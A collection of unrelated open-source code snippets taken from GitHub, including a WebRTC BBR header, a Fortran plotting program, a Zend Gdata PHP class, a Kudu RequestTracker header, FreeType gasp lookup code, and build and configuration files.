).dependsOn(nettyServer, specs2 % "test")
lazy val nettyUploads = module("netty-uploads")().settings(
description := "Uploads plan support using Netty",
libraryDependencies ++= integrationTestDeps.value,
parallelExecution in Test := false
).dependsOn(nettyServer, uploads, specs2 % "test")
require 'spec_helper'
describe "SignoutStories" do
let(:member) {
FactoryBot.create(:member, password: 'mala', password_confirmation: 'mala')
}
context "when sign in as a member" do
before { login_as(member) }
it {
click_on 'Sign Out'
expect(current_path).to be == '/login'
}
end
end
/*
* Copyright 2018 The WebRTC project authors. All Rights Reserved.
*
* Use of this source code is governed by a BSD-style license
* that can be found in the LICENSE file in the root of the source
* tree. An additional intellectual property rights grant can be found
* in the file PATENTS. All contributing project authors may
* be found in the AUTHORS file in the root of the source tree.
*/
#ifndef MODULES_CONGESTION_CONTROLLER_BBR_TEST_BBR_PRINTER_H_
#define MODULES_CONGESTION_CONTROLLER_BBR_TEST_BBR_PRINTER_H_
#include <memory>
#include "modules/congestion_controller/bbr/bbr_factory.h"
#include "modules/congestion_controller/bbr/bbr_network_controller.h"
#include "modules/congestion_controller/test/controller_printer.h"
namespace webrtc {
class BbrStatePrinter : public DebugStatePrinter {
public:
BbrStatePrinter();
~BbrStatePrinter() override;
void Attach(bbr::BbrNetworkController*);
bool Attached() const override;
void PrintHeaders(FILE* out) override;
void PrintValues(FILE* out) override;
NetworkControlUpdate GetState(Timestamp at_time) const override;
private:
bbr::BbrNetworkController* controller_ = nullptr;
};
class BbrDebugFactory : public BbrNetworkControllerFactory {
public:
explicit BbrDebugFactory(BbrStatePrinter* printer);
std::unique_ptr<NetworkControllerInterface> Create(
NetworkControllerConfig config) override;
bbr::BbrNetworkController* BbrController();
private:
BbrStatePrinter* printer_;
bbr::BbrNetworkController* controller_ = nullptr;
};
} // namespace webrtc
#endif // MODULES_CONGESTION_CONTROLLER_BBR_TEST_BBR_PRINTER_H_
|
{
"pile_set_name": "Github"
}
| null | null |
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<appSettings>
<add key="webPages:Enabled" value="false" />
<add key="ViewCache:Enabled" value="false" />
<add key="ViewPath:Value" value="Views" />
<add key="ViewRecursiveDiscovery:Enabled" value="true" />
</appSettings>
</configuration>
|
{
"pile_set_name": "Github"
}
| null | null |
INCLUDE 'VICMAIN_FOR'
SUBROUTINE MAIN44
C PROGRAM QPLOT2
C 10 JUL 95 ...CRS (CRI) MST S/W CONVERSION (VICAR PORTING)
C 22 AUG 85 ...JHR... CONVERTED TO VICAR2, RENAMED QPLOT2
C 22 APR 82 ...JHR... INITIAL RELEASE
C E,QPLOT2,IN,*,,PARAMS
C THIS PROGRAM PLOTS LINES OF DN VS RELATIVE SAMPLE NUMBER.
C A MAXIMUM OF 10 LINES MAY BE PLOTTED ON THE GRAPH
C A MAXIMUM OF 10 DATA SETS MAY BE USED
C ANY LINE DIRECTION MAY BE SPECIFIED
C IF THE LINE DIRECTION IS NOT HORIZONTAL OR VERTICAL
C THE OUTPUT SAMPLE POINTS ARE SPACED THE SAME AS THE X AND Y
C AXES, I.E. IF THE LINE DIRECTION IS 45 DEGREES THE NUMBER OF
C OUTPUT SAMPLES WILL BE THE SQUARE ROOT OF 2 TIMES THE NUMBER
C OF INPUT SAMPLES
C
C * PROCESS IN,SL,SS,EL,ES SPECIFIES THE INPUT NUMBER,
C STARTING LINE, STARTING SAMPLE, ENDING LINE, AND
C ENDING SAMPLE.
C
C
implicit none
EXTERNAL EQUIV
COMMON/C1/ SIZE,displace,RDS,XMIN,XMAX,YMIN,YMAX
& ,XSCLMN,XSCLMX,YSCLMN,YSCLMX,XSCLDT
& ,YSCLDT,XLNGTH,YLNGTH,FORMAT,NORM,NCHAN
& ,xsclset,ysclset
COMMON/C2/ SL,SS,EL,ES,IN,UNIT,ILINE,NLINES
& ,NLI,NSI,NSCHAN,GTYPE,XPAGE,LB,LABTOP
common/files/filename
common/commonheader/headermsg,nheadermsg,iiline,i2line
integer*4 iiline,i2line,nheadermsg(220) !! index into header strings
INTEGER*4 IN(10),SL(10),SS(10),EL(10),ES(10),UNIT(10)
INTEGER*4 GTYPE,TTLTOP,NLI(10),NSI(10),NBI(10)
integer*4 STAT,IPARM(256),TICS
integer*4 i,ii,j,jj,n,icount,idef,iline,ind,isize,psize
integer*4 labtop,lcheck,lx,ly,lb,ni,nlines,np,nschan,ntest
integer*4 ntics,ntitle,ntitx,ntity,nx,ny,nchan,naline
integer*4 plotwid,plotht,ntbl,nplotgpi,nplotout
integer*4 nplotgpi2,nploteps,ntmptbl,charsize,charsteps
integer*4 pttype(20),lntype(20),ptcolorl(20)
REAL*4 RPARM(256),XAXIS(4),YAXIS(4)
REAL*4 XMAX(10),XMIN(10),YMAX(10),YMIN(10)
REAL*4 XSCLMN,XSCLMX,YSCLMN,YSCLMX,XLNGTH,YLNGTH
real*4 displace,rds,size,xpage,xscldt,yscldt
logical*4 XVPTST, NORM, xsclset, ysclset, epsplot, nolabel
character*1 LPARM(1024)
character*4 FORMAT(10),aline
character*8 plotfmt
character*24 tbl,tmptbl
character*30 alinenum
CHARACTER*63 XTTL,YTTL,TTL,CBUF,XTITLE,YTITLE,TITLE
character*63 msg,plotgpi,plotgpi2,ploteps
character*56 headermsg(220) !! Labels * (lines per label+2)
CHARACTER*63 plotout
character*120 filename(10)
c
character*8 ptcolor(20),lncolor(20)
character*4 gpi/'.gpi'/,eps/'.eps'/,asc/'.asc'/
c
character*1 num(5)
character bash
c
data num/'1','2','3','4','5'/
data tmptbl/'tmptbl.'/
data aline/'line'/
C
data pttype/ 5, 9, 7,13,11, 1, 2, 3, 5, 9, 7,13,11, 1, 2, 3, 5, 9, 7,13/
data lntype/ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1/
data ptcolor/'green','purple','magenta','blue','brown',
1 'red','cyan','orange','green','purple',
2 'magenta','blue','brown','red','cyan',
3 'orange','green','purple','magenta','blue'/
data ptcolorl/5,6,7,4,5, 3,4,6,5,6, 7,4,5,3,4, 6,5,6,7,4/
data lncolor/'beige','red','green','cyan','purple',
1 'blue','orange','magenta','beige','red',
2 'green','cyan','purple','blue','orange',
3 'magenta','beige','red','green','cyan'/
c
call xvmessage('qplot2 version 2015-08-19',' ')
bash=achar(92)
C
C SET DEFAULTS AND INITIALIZE
c tbl='tmptbl.x'
c ntbl=index(tbl,' ') - 1
YTITLE = 'DN VALUE'
XTITLE = 'RELATIVE SAMPLE NUMBER'
TITLE = 'IPL LINE PLOT'
C 'PLOTNAME'
epsplot=.false.
nplotgpi = 0
nplotgpi2 = 0
nplotout = 0
nploteps = 0
ntbl = 0
epsplot = .false.
CALL XVPARM ('PLOTFMT',plotfmt,icount,idef,1)
if (plotfmt .eq. 'EPS' .or. plotfmt .eq. 'eps') epsplot = .true.
PLOTOUT= 'qplot.eps'
nplotout=index(plotout,' ') - 1
plotgpi= 'qplot.gpi'
nplotgpi=index(plotgpi,' ') - 1
plotgpi2= 'qplot.eps.gpi'
nplotgpi2=index(plotgpi2,' ') - 1
tbl='qplot.asc'
ntbl = index(tbl,' ') - 1
CALL XVPARM('PLOTOUT',cbuf,ICOUNT,IDEF,1)
IF (IDEF .EQ. 0) THEN
if (cbuf .eq. "YES" .or. cbuf .eq."yes") then
c epsplot = .true.
plotout='qplot'
nplotout=index(plotout,' ') - 1
plotgpi=plotout(1:nplotout)//gpi
nplotgpi=index(plotgpi,' ') - 1
plotgpi2=plotout(1:nplotout)//eps//gpi
nplotgpi2=index(plotgpi2,' ') - 1
ploteps=plotout(1:nplotout)//eps
nploteps=index(ploteps,' ') - 1
tbl = plotout(1:nplotout)//asc
ntbl = index(tbl,' ') - 1
tmptbl = tbl(1:ntbl)
c Plotout and nplotout from above
elseif (cbuf .eq. "NONE" .or. cbuf .eq."none") then
c epsplot = .false.
plotgpi='qplot
|
{
"pile_set_name": "Github"
}
| null | null |
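The QPLOT2 header above notes that output samples along a slanted line are spaced like the axes, so a 45-degree line yields roughly the square root of 2 times as many samples as input. A minimal Python sketch of that sample-count arithmetic (the helper name is hypothetical, not part of the program):

```python
import math

def num_output_samples(sl, ss, el, es):
    # Samples are spaced one unit apart along the line from
    # (sl, ss) to (el, es), so the count follows the Euclidean
    # length; a 45-degree line gives ~sqrt(2) times the inputs.
    length = math.hypot(el - sl, es - ss)
    return int(length) + 1
```

For a horizontal 101-sample line this returns 101; for the 45-degree line between the same line/sample bounds it returns 142, about sqrt(2) times as many.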
<?php
/**
* Zend Framework
*
* LICENSE
*
* This source file is subject to the new BSD license that is bundled
* with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
* http://framework.zend.com/license/new-bsd
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@zend.com so we can send you a copy immediately.
*
* @category Zend
* @package Zend_Gdata
* @subpackage Media
* @copyright Copyright (c) 2005-2010 Zend Technologies USA Inc. (http://www.zend.com)
* @license http://framework.zend.com/license/new-bsd New BSD License
* @version $Id: MediaRating.php 20096 2010-01-06 02:05:09Z bkarwin $
*/
/**
* @see Zend_Gdata_Extension
*/
require_once 'Zend/Gdata/Extension.php';
/**
* Represents the media:rating element specific to YouTube.
*
* @category Zend
* @package Zend_Gdata
* @subpackage YouTube
* @copyright Copyright (c) 2005-2010 Zend Technologies USA Inc. (http://www.zend.com)
* @license http://framework.zend.com/license/new-bsd New BSD License
*/
class Zend_Gdata_YouTube_Extension_MediaRating extends Zend_Gdata_Extension
{
protected $_rootElement = 'rating';
protected $_rootNamespace = 'media';
/**
* @var string
*/
protected $_scheme = null;
/**
* @var string
*/
protected $_country = null;
/**
* Constructs a new MediaRating element
*
* @param string $text
* @param string $scheme
* @param string $country
*/
public function __construct($text = null, $scheme = null, $country = null)
{
$this->registerAllNamespaces(Zend_Gdata_Media::$namespaces);
parent::__construct();
$this->_scheme = $scheme;
$this->_country = $country;
$this->_text = $text;
}
/**
* Retrieves a DOMElement which corresponds to this element and all
* child properties. This is used to build an entry back into a DOM
* and eventually XML text for sending to the server upon updates, or
* for application storage/persistence.
*
* @param DOMDocument $doc The DOMDocument used to construct DOMElements
* @return DOMElement The DOMElement representing this element and all
* child properties.
*/
public function getDOM($doc = null, $majorVersion = 1, $minorVersion = null)
{
$element = parent::getDOM($doc, $majorVersion, $minorVersion);
if ($this->_scheme !== null) {
$element->setAttribute('scheme', $this->_scheme);
}
if ($this->_country != null) {
$element->setAttribute('country', $this->_country);
}
return $element;
}
/**
* Given a DOMNode representing an attribute, tries to map the data into
* instance members. If no mapping is defined, the name and value are
* stored in an array.
*
* @param DOMNode $attribute The DOMNode attribute needed to be handled
*/
protected function takeAttributeFromDOM($attribute)
{
switch ($attribute->localName) {
case 'scheme':
$this->_scheme = $attribute->nodeValue;
break;
case 'country':
$this->_country = $attribute->nodeValue;
break;
default:
parent::takeAttributeFromDOM($attribute);
}
}
/**
* @return string
*/
public function getScheme()
{
return $this->_scheme;
}
/**
* @param string $value
* @return Zend_Gdata_YouTube_Extension_MediaRating Provides a fluent interface
*/
public function setScheme($value)
{
$this->_scheme = $value;
return $this;
}
/**
* @return string
*/
public function getCountry()
{
return $this->_country;
}
/**
* @param string $value
* @return Zend_Gdata_YouTube_Extension_MediaRating Provides a fluent interface
*/
public function setCountry($value)
{
$this->_country = $value;
return $this;
}
}
|
{
"pile_set_name": "Github"
}
| null | null |
/* Update alert message: A new version of {APP NAME} is available. Please update to version {NEW VERSION} now.*/
"A new version of %@ is available. Please update to version %@ now."="نسخه جدید %@ در دسترس است. لطفا همین حالا به نسخه %@ بروزرسانی کنید.";
/* Update alert title */
"Update Available"="بروزرسانی در دسترس";
/* Update alert dismiss button title */
"Next time"="دفعه بعد";
/* Update alert skip button title */
"Skip this version"="رد این نسخه";
/* Update alert skip button title */
"Update"="بروزرسانی";
|
{
"pile_set_name": "Github"
}
| null | null |
// Container widths
//
// Set the container width, and override it for fixed navbars in media queries.
@if $enable-grid-classes {
.container {
@include make-container();
@include make-container-max-widths();
}
}
// Fluid container
//
// Utilizes the mixin meant for fixed width containers, but with 100% width for
// fluid, full width layouts.
@if $enable-grid-classes {
.container-fluid {
@include make-container();
}
}
// Row
//
// Rows contain and clear the floats of your columns.
@if $enable-grid-classes {
.row {
@include make-row();
}
// Remove the negative margin from default .row, then the horizontal padding
// from all immediate children columns (to prevent runaway style inheritance).
.no-gutters {
margin-right: 0;
margin-left: 0;
> .col,
> [class*="col-"] {
padding-right: 0;
padding-left: 0;
}
}
}
// Columns
//
// Common styles for small and large grid columns
@if $enable-grid-classes {
@include make-grid-columns();
}
|
{
"pile_set_name": "Github"
}
| null | null |
// Licensed to the Apache Software Foundation (ASF) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The ASF licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
#pragma once
#include <cstdint>
#include <set>
#include <string>
#include "kudu/gutil/ref_counted.h"
#include "kudu/util/locks.h"
#include "kudu/util/status.h"
namespace kudu {
namespace rpc {
// RequestTracker implementation, inspired by:
// "Implementing Linearizability at Large Scale and Low Latency" by Collin Lee et al.
//
// This generates sequence numbers for retriable RPCs and tracks the ongoing ones.
// The main point of this is to enable exactly-once semantics, i.e. making sure that
// an RPC is only executed once, by uniquely identifying each RPC that is sent to
// the server.
//
// Note that the sequence numbers here are different from RPC 'call ids'. A call id
// uniquely identifies a call _to a server_. All calls have a call id that is
// assigned incrementally. Sequence numbers, on the other hand, uniquely identify
// the RPC operation itself. That is, if an RPC is retried on another server it will
// have a different call id, but the same sequence number.
//
// By keeping track of the RPCs that are in-flight and which ones are completed
// we can determine the first incomplete RPC. When this information is sent
// to the server it can use it to garbage collect RPC results that it might be
// saving for future retries, since it now knows there won't be any.
//
// This class is thread safe.
class RequestTracker : public RefCountedThreadSafe<RequestTracker> {
public:
typedef int64_t SequenceNumber;
static const RequestTracker::SequenceNumber kNoSeqNo;
explicit RequestTracker(std::string client_id);
// Creates a new, unique, sequence number.
// Sequence numbers are assigned in increasing integer order.
// Returns Status::OK() and sets 'seq_no' if it was able to generate a sequence number
// or returns Status::ServiceUnavailable() if too many RPCs are in-flight, in which case
// the caller should try again later.
Status NewSeqNo(SequenceNumber* seq_no);
// Returns the sequence number of the first incomplete RPC.
// If there is no incomplete RPC returns kNoSeqNo.
SequenceNumber FirstIncomplete();
// Marks the rpc with 'seq_no' as completed.
void RpcCompleted(const SequenceNumber& seq_no);
// Returns the client id for this request tracker.
const std::string& client_id() { return client_id_; }
private:
// The client id for this request tracker.
const std::string client_id_;
// Lock that protects all non-const fields.
simple_spinlock lock_;
// The next sequence number.
SequenceNumber next_;
// The (ordered) set of incomplete RPCs.
std::set<SequenceNumber> incomplete_rpcs_;
};
} // namespace rpc
} // namespace kudu
|
{
"pile_set_name": "Github"
}
| null | null |
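The RequestTracker header comment above describes the bookkeeping: assign increasing sequence numbers, track the set of incomplete RPCs, and report the first incomplete number so the server can garbage-collect saved results below it. A rough Python sketch of that idea (the class shape mirrors the declared C++ interface, but the in-flight limit and error handling here are illustrative, not Kudu's actual values):

```python
class RequestTracker:
    NO_SEQ_NO = -1

    def __init__(self, client_id, max_in_flight=16):
        self.client_id = client_id
        self._next = 0
        self._incomplete = set()
        self._max_in_flight = max_in_flight

    def new_seq_no(self):
        # Stands in for Status::ServiceUnavailable() when too many
        # RPCs are in flight; the caller should retry later.
        if len(self._incomplete) >= self._max_in_flight:
            raise RuntimeError("too many RPCs in flight; retry later")
        seq = self._next
        self._next += 1
        self._incomplete.add(seq)
        return seq

    def first_incomplete(self):
        # The server may discard saved results for everything below this.
        return min(self._incomplete) if self._incomplete else self.NO_SEQ_NO

    def rpc_completed(self, seq_no):
        self._incomplete.discard(seq_no)
```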
/***************************************************************************/
/* */
/* ftgasp.c */
/* */
/* Access of TrueType's `gasp' table (body). */
/* */
/* Copyright 2007 by */
/* David Turner, Robert Wilhelm, and Werner Lemberg. */
/* */
/* This file is part of the FreeType project, and may only be used, */
/* modified, and distributed under the terms of the FreeType project */
/* license, LICENSE.TXT. By continuing to use, modify, or distribute */
/* this file you indicate that you have read the license and */
/* understand and accept it fully. */
/* */
/***************************************************************************/
#include <ft2build.h>
#include FT_GASP_H
#include FT_INTERNAL_TRUETYPE_TYPES_H
FT_EXPORT_DEF( FT_Int )
FT_Get_Gasp( FT_Face face,
FT_UInt ppem )
{
FT_Int result = FT_GASP_NO_TABLE;
if ( face && FT_IS_SFNT( face ) )
{
TT_Face ttface = (TT_Face)face;
if ( ttface->gasp.numRanges > 0 )
{
TT_GaspRange range = ttface->gasp.gaspRanges;
TT_GaspRange range_end = range + ttface->gasp.numRanges;
while ( ppem > range->maxPPEM )
{
range++;
if ( range >= range_end )
goto Exit;
}
result = range->gaspFlag;
/* ensure that we don't have spurious bits */
if ( ttface->gasp.version == 0 )
result &= 3;
}
}
Exit:
return result;
}
/* END */
|
{
"pile_set_name": "Github"
}
| null | null |
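`FT_Get_Gasp` above scans the table's ranges in ascending `maxPPEM` order, returns the flag of the first range covering the requested ppem, and for version-0 tables masks off all but the two low bits. The same lookup expressed in Python (a sketch; the range data in the usage below is made up):

```python
FT_GASP_NO_TABLE = -1

def get_gasp(gasp_ranges, ppem, version=0):
    # gasp_ranges: (max_ppem, gasp_flag) pairs sorted by max_ppem.
    for max_ppem, flag in gasp_ranges:
        if ppem <= max_ppem:
            # Version-0 tables only define the two low flag bits.
            return flag & 3 if version == 0 else flag
    return FT_GASP_NO_TABLE
```

With ranges `[(8, 2), (16, 1), (65535, 15)]`, a ppem of 10 selects the second range's flag, and the final range's flag of 15 is masked to 3 unless the table version is nonzero.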
// Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT.
// Package eks provides the client and types for making API
// requests to Amazon Elastic Kubernetes Service.
//
// Amazon Elastic Kubernetes Service (Amazon EKS) is a managed service that
// makes it easy for you to run Kubernetes on AWS without needing to stand up
// or maintain your own Kubernetes control plane. Kubernetes is an open-source
// system for automating the deployment, scaling, and management of containerized
// applications.
//
// Amazon EKS runs up-to-date versions of the open-source Kubernetes software,
// so you can use all the existing plugins and tooling from the Kubernetes community.
// Applications running on Amazon EKS are fully compatible with applications
// running on any standard Kubernetes environment, whether running in on-premises
// data centers or public clouds. This means that you can easily migrate any
// standard Kubernetes application to Amazon EKS without any code modification
// required.
//
// See https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01 for more information on this service.
//
// See eks package documentation for more information.
// https://docs.aws.amazon.com/sdk-for-go/api/service/eks/
//
// Using the Client
//
// To contact Amazon Elastic Kubernetes Service with the SDK use the New function to create
// a new service client. With that client you can make API requests to the service.
// These clients are safe to use concurrently.
//
// See the SDK's documentation for more information on how to use the SDK.
// https://docs.aws.amazon.com/sdk-for-go/api/
//
// See aws.Config documentation for more information on configuring SDK clients.
// https://docs.aws.amazon.com/sdk-for-go/api/aws/#Config
//
// See the Amazon Elastic Kubernetes Service client EKS for more
// information on creating client for this service.
// https://docs.aws.amazon.com/sdk-for-go/api/service/eks/#New
package eks
|
{
"pile_set_name": "Github"
}
| null | null |
/*
* Copyright (C) 2016 Red Hat, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.syndesis.server.runtime.swagger;
import java.util.List;
import java.util.stream.Collectors;
import java.util.stream.Stream;
import io.swagger.v3.core.jackson.ModelResolver;
import io.swagger.v3.core.util.Json;
import io.swagger.v3.oas.models.media.Schema;
import io.syndesis.common.model.Kind;
/**
* We're using {@link Kind#modelName} as value for the {@link Kind} enum values.
* The OpenAPI document generation has no knowledge of that so this
* {@link ModelResolver} sets {@code enum} values to the values of the
* {@code modelName}.
*/
public final class KindModelResolver extends ModelResolver {
private static final List<String> KINDS;
static {
KINDS = Stream.of(Kind.values())
.map(k -> k.modelName)
.collect(Collectors.toList());
}
public KindModelResolver() {
super(Json.mapper());
}
@Override
protected void _addEnumProps(final Class<?> propClass, @SuppressWarnings("rawtypes") final Schema property) {
if (Kind.class.equals(propClass)) {
@SuppressWarnings("unchecked")
final Schema<String> kindProperty = property;
kindProperty.setEnum(KINDS);
} else {
super._addEnumProps(propClass, property);
}
}
}
|
{
"pile_set_name": "Github"
}
| null | null |
<?xml version="1.0" encoding="UTF-8"?>
<!--
DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS HEADER.
Copyright (c) 1997-2017 Oracle and/or its affiliates. All rights reserved.
The contents of this file are subject to the terms of either the GNU
General Public License Version 2 only ("GPL") or the Common Development
and Distribution License("CDDL") (collectively, the "License"). You
may not use this file except in compliance with the License. You can
obtain a copy of the License at
https://glassfish.dev.java.net/public/CDDL+GPL_1_1.html
or packager/legal/LICENSE.txt. See the License for the specific
language governing permissions and limitations under the License.
When distributing the software, include this License Header Notice in each
file and include the License file at packager/legal/LICENSE.txt.
GPL Classpath Exception:
Oracle designates this particular file as subject to the "Classpath"
exception as provided by Oracle in the GPL Version 2 section of the License
file that accompanied this code.
Modifications:
If applicable, add the following below the License Header, with the fields
enclosed by brackets [] replaced by your own identifying information:
"Portions Copyright [year] [name of copyright owner]"
Contributor(s):
If you wish your version of this file to be governed by only the CDDL or
only the GPL Version 2, indicate your decision by adding "[Contributor]
elects to include this software in this distribution under the [CDDL or GPL
Version 2] license." If you don't indicate a single choice of license, a
recipient has the option to distribute your version of this file under
either the CDDL, the GPL Version 2 or to extend the choice of license to
its licensees as provided above. However, if you add GPL Version 2 code
and therefore, elected the GPL Version 2 license, then the option applies
only if the new code is made subject to such option by the copyright
holder.
-->
<web-app version="3.0" xmlns="http://java.sun.com/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_3_0.xsd">
<context-param>
<param-name>javax.faces.PROJECT_STAGE</param-name>
<param-value>${webapp.projectStage}</param-value>
</context-param>
<context-param>
<param-name>javax.faces.PARTIAL_STATE_SAVING</param-name>
<param-value>${webapp.partialStateSaving}</param-value>
</context-param>
<context-param>
<param-name>javax.faces.STATE_SAVING_METHOD</param-name>
<param-value>${webapp.stateSavingMethod}</param-value>
</context-param>
<context-param>
<param-name>javax.faces.SERIALIZE_SERVER_STATE</param-name>
<param-value>${webapp.serializeServerState}</param-value>
</context-param>
<servlet>
<servlet-name>Faces Servlet</servlet-name>
<servlet-class>javax.faces.webapp.FacesServlet</servlet-class>
<load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>Faces Servlet</servlet-name>
<url-pattern>/faces/*</url-pattern>
</servlet-mapping>
<welcome-file-list>
<welcome-file>faces/index.xhtml</welcome-file>
</welcome-file-list>
</web-app>
|
{
"pile_set_name": "Github"
}
| null | null |
These are the functions which can be called on a minecraft:effects_changed criteria
trigger.
addEffect:
Arguments:
String
Usage:
potion type
Notes:
Adds a PotionEffectData for the provided potion type and returns it so functions can be called on it.
|
{
"pile_set_name": "Github"
}
| null | null |
; RUN: opt -strip -S < %s | FileCheck %s
; PR10286
@main_addrs = constant [2 x i8*] [i8* blockaddress(@f, %FOO), i8* blockaddress(@f, %BAR)]
; CHECK: @main_addrs = constant [2 x i8*] [i8* blockaddress(@f, %2), i8* blockaddress(@f, %3)]
declare void @foo() nounwind
declare void @bar() nounwind
define void @f(i8* %indirect.goto.dest) nounwind uwtable ssp {
entry:
indirectbr i8* %indirect.goto.dest, [label %FOO, label %BAR]
; CHECK: indirectbr i8* %0, [label %2, label %3]
FOO:
call void @foo()
ret void
BAR:
call void @bar()
ret void
}
|
{
"pile_set_name": "Github"
}
| null | null |
import FWCore.ParameterSet.Config as cms
from Configuration.StandardSequences.Eras import eras
process = cms.Process('TEST', eras.Run2_2018)
# minimum of logs
process.MessageLogger = cms.Service("MessageLogger",
statistics = cms.untracked.vstring(),
destinations = cms.untracked.vstring("cout"),
cout = cms.untracked.PSet(
threshold = cms.untracked.string("WARNING")
)
)
# raw data source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring("/store/data/Run2018D/ZeroBias/RAW/v1/000/320/688/00000/601A721D-AD95-E811-B21A-FA163E28A50A.root"),
#fileNames = cms.untracked.vstring("root://eoscms.cern.ch//eos/cms/store/group/phys_pps/sw_test_input/601A721D-AD95-E811-B21A-FA163E28A50A.root"),
inputCommands = cms.untracked.vstring(
'drop *',
'keep FEDRawDataCollection_*_*_*'
)
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1000)
)
# raw-to-digi conversion
process.load("EventFilter.CTPPSRawToDigi.ctppsRawToDigi_cff")
# local RP reconstruction chain with standard settings
process.load("RecoPPS.Configuration.recoCTPPS_cff")
# define GT
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, "106X_dataRun2_v26")
# override alignment settings
process.load("CalibPPS.ESProducers.ctppsRPAlignmentCorrectionsDataESSourceXML_cfi")
process.ctppsRPAlignmentCorrectionsDataESSourceXML.RealFiles = cms.vstring(
"RecoPPS/Local/test/re_alignment/align_base.xml"
)
process.esPreferLocalAlignment = cms.ESPrefer("CTPPSRPAlignmentCorrectionsDataESSourceXML", "ctppsRPAlignmentCorrectionsDataESSourceXML")
# track plotter
process.ctppsTrackDistributionPlotter = cms.EDAnalyzer("CTPPSTrackDistributionPlotter",
tagTracks = cms.InputTag("ctppsLocalTrackLiteProducer"),
outputFile = cms.string("output_tracks_base.root")
)
# processing sequences
process.path = cms.Path(
process.ctppsRawToDigi
* process.recoCTPPS
* process.ctppsTrackDistributionPlotter
)
# output configuration
process.output = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string("output_base.root"),
outputCommands = cms.untracked.vstring(
"drop *",
'keep CTPPSLocalTrackLites_*_*_*'
)
)
process.outpath = cms.EndPath(process.output)
|
{
"pile_set_name": "Github"
}
| null | null |
#pragma once
#include <ostream>
#include_next <unordered_map>
#include <elle/print-fwd.hh>
namespace std
{
template <typename... Args>
std::ostream&
operator <<(ostream& out,
unordered_map<Args...> const& s)
{
auto const format = is_fixed(out) ? "%s%f: %f" : "%s%s: %s";
out << '{';
auto* sep = "";
for (auto const& e: s)
{
elle::print(out, format, sep, e.first, e.second);
sep = ", ";
}
out << '}';
return out;
}
template <typename... Args>
class keys_iterator
: public std::unordered_map<Args...>::iterator
{
public:
using Super = typename std::unordered_map<Args...>::iterator;
keys_iterator() = default;
keys_iterator(Super s)
: Super(s)
{}
auto
operator*()
{
return Super::operator*().first;
}
};
template <typename... Args>
class const_keys_iterator
: public std::unordered_map<Args...>::const_iterator
{
public:
using Super = typename std::unordered_map<Args...>::const_iterator;
const_keys_iterator() = default;
const_keys_iterator(Super s)
: Super(s)
{}
auto
operator*()
{
return Super::operator*().first;
}
};
template <typename... Args>
const_keys_iterator<Args...>
iter_keys(std::unordered_map<Args...> const& c)
{
return const_keys_iterator<Args...>(c.begin());
}
template <typename... Args>
const_keys_iterator<Args...>
iter_keys_end(std::unordered_map<Args...> const& c)
{
return const_keys_iterator<Args...>(c.end());
}
template <typename... Args>
class values_iterator
: public std::unordered_map<Args...>::iterator
{
public:
using Super = typename std::unordered_map<Args...>::iterator;
values_iterator() = default;
values_iterator(Super s)
: Super(s)
{}
auto&
operator*()
{
return Super::operator*().second;
}
};
template <typename... Args>
values_iterator<Args...>
iter_values(std::unordered_map<Args...>& c)
{
return values_iterator<Args...>(c.begin());
}
template <typename... Args>
class const_values_iterator
: public std::unordered_map<Args...>::const_iterator
{
public:
using Super = typename std::unordered_map<Args...>::const_iterator;
const_values_iterator() = default;
const_values_iterator(Super s)
: Super(s)
{}
auto&
operator*()
{
return Super::operator*().second;
}
};
template <typename... Args>
const_values_iterator<Args...>
iter_values(std::unordered_map<Args...> const& c)
{
return const_values_iterator<Args...>(c.begin());
}
// http://www.open-std.org/JTC1/SC22/wg21/docs/papers/2014/n4161.htm
template <typename... Args, typename Pred>
void erase_if(unordered_map<Args...>& c, Pred pred)
{
for (auto it = begin(c); it != end(c);)
if (pred(*it))
it = c.erase(it);
else
++it;
}
}
// Local Variables:
// mode: c++
// End:
|
{
"pile_set_name": "Github"
}
| null | null |
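The `erase_if` helper above (from proposal N4161) shows the safe C++ idiom of advancing the iterator with the value `erase()` returns. A Python analogue has to dodge the same hazard differently, since deleting from a `dict` while iterating over it raises `RuntimeError`; one sketch (the return value is an added convenience, not part of N4161):

```python
def erase_if(mapping, pred):
    # Snapshot the matching keys first, then delete them, so we
    # never mutate the dict while iterating over it.
    doomed = [k for k, v in mapping.items() if pred(k, v)]
    for k in doomed:
        del mapping[k]
    return len(doomed)
```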
/* __ *\
** ________ ___ / / ___ Scala API **
** / __/ __// _ | / / / _ | (c) 2002-2011, LAMP/EPFL **
** __\ \/ /__/ __ |/ /__/ __ | http://scala-lang.org/ **
** /____/\___/_/ |_/____/_/ | | **
** |/ **
\* */
// GENERATED CODE: DO NOT EDIT. See scala.Function0 for timestamp.
package scala
/** A tuple of 19 elements; the canonical representation of a [[scala.Product19]].
*
